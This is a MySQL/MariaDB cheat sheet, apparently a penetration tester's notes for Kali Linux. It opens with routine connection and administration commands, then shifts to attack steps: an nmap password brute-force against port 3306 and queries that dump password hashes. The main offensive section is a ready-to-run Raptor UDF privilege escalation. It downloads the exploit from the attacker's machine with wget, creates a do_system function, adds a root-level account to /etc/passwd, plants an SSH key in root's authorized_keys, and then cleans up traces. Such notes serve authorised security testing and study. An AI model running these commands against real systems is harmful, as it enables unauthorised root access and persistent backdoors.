MySQL database quick reference.
MariaDB is a fork of MySQL and uses similar syntax.
Start MySQL service on Kali
sudo service mysql start
Stop MySQL service on Kali
sudo service mysql stop
Connection
On Kali
sudo mysql
Locally
mysql -u <username> -p <database>
mysql -u<username> -p<password> -e 'show databases;'
Remote server
mysql -u <username> -p -h $IP
mysql -u <username> -p -h $IP --port=1234
Nmap scripts
ls -la /usr/share/nmap/scripts/mysql*
nmap -p 3306 --script=mysql* $IP
WL=/usr/share/wordlists/rockyou.txt
nmap -p 3306 --script=mysql-brute $IP --script-args userdb=users.txt,passdb=$WL
Examples
Configurations / Parameters
Server variables (runtime configuration)
Use \G to display results vertically (easier to read).
show variables\G;
Configuration and data file locations (Windows / XAMPP)
C:\Windows\my.ini
C:\Windows\my.cnf
C:\my.ini
C:\my.cnf
C:\xampp\mysql\my.ini
C:\xampp\mysql\my.cnf
C:\xampp\mysql\bin\my.ini
C:\xampp\mysql\bin\my.cnf
C:\xampp\mysql\data\mysql_upgrade_info
C:\xampp\mysql\data\user.frm
C:\xampp\mysql\data\mysql_error.log
C:\xampp\xampp-control.ini
#-------------------------------------------------------------------------------
# Configurations / Parameters
#-------------------------------------------------------------------------------
# Never run MySQL as root or as nobody
# mysqld refuses to run as root unless that is specified explicitly using the --user=root option
# Configuration file:
my.cnf
# Start MySQL
mysql.server start
# Stop MySQL
mysql.server stop
# Execute OS commands from within the mysql client (they run on the client host, not on the server)
\! ls -l
\! nano
\! bash
# Comments
SELECT 1+1; # This comment continues to the end of line
SELECT 1+1; -- This comment continues to the end of line
SELECT 1 /* in-line or multiple line comment */ + 1;
# Quoting identifiers (backticks for reserved words; MySQL also accepts single quotes around an alias)
` or '
SELECT * FROM `select` WHERE `select`.id > 100;
SELECT 1 AS `one`, 2 AS 'two';
# List all databases
show databases;
# List all tables
use dbname;
show tables;
#-------------------------------------------------------------------------------
# Write files
#-------------------------------------------------------------------------------
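-- Export selected columns as CSV. INTO OUTFILE needs the FILE privilege, the server's
-- secure_file_priv setting must allow the target directory, the file is written by the
-- server process (not the client), and it must not already exist.
SELECT id, name, email FROM customers
INTO OUTFILE '/tmp/customers.csv'
FIELDS TERMINATED BY ','
ENCLOSED BY '"'
LINES TERMINATED BY '\n';
-- Minimal write test for the same privilege / path restrictions.
SELECT 1 FROM information_schema.tables LIMIT 1 INTO OUTFILE '/tmp/test.txt';
-- Enumerate schemas, then tables, then columns; replace the quoted placeholders
-- with a value returned by the previous query.
SELECT DISTINCT table_schema FROM information_schema.tables;
SELECT table_name FROM information_schema.tables WHERE table_schema = 'schema found in previous query';
SELECT column_name FROM information_schema.columns WHERE table_name = 'table found in previous query';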
Users and passwords
The name of the password-hash column depends on the server version; try both:
select user, authentication_string from mysql.user;
select user, password from mysql.user;
Privilege Escalation
Raptor
https://www.exploit-db.com/exploits/1518
Requires gcc on target, unless target is Debian (in this case compile on Kali).
searchsploit -m linux/local/1518.c
### REMOVE LINES AT THE END OF EXPLOIT
python3 -m http.server 80
wget -O /tmp/raptor_udf2.c http://KALI_IP/1518.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
Change the path used to write raptor_udf2.so so that it matches the output of "select @@plugin_dir".
mysql -u root
use mysql
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select @@plugin_dir
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('id > /tmp/out; chown myuser.myuser /tmp/out');
Via /etc/passwd
select do_system('echo myprecious:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd');
ssh myprecious@x.x.x.x
[PreciouS]
Via authorized_keys
Alternatively, the key pair can be generated in the user's home directory on the target; this also works.
# Generate a public/private key pair
ssh-keygen -t rsa
[accept all defaults]
chmod 400 id_rsa
select do_system('echo "ssh-rsa ..." >> /root/.ssh/authorized_keys');
ssh -i id_rsa root@x.x.x.x
Cleanup tasks
mysql -u root
use mysql
drop function do_system;
select * from mysql.func;
quit
find / -name raptor_udf2.so
rm /<path to file>/raptor_udf2.so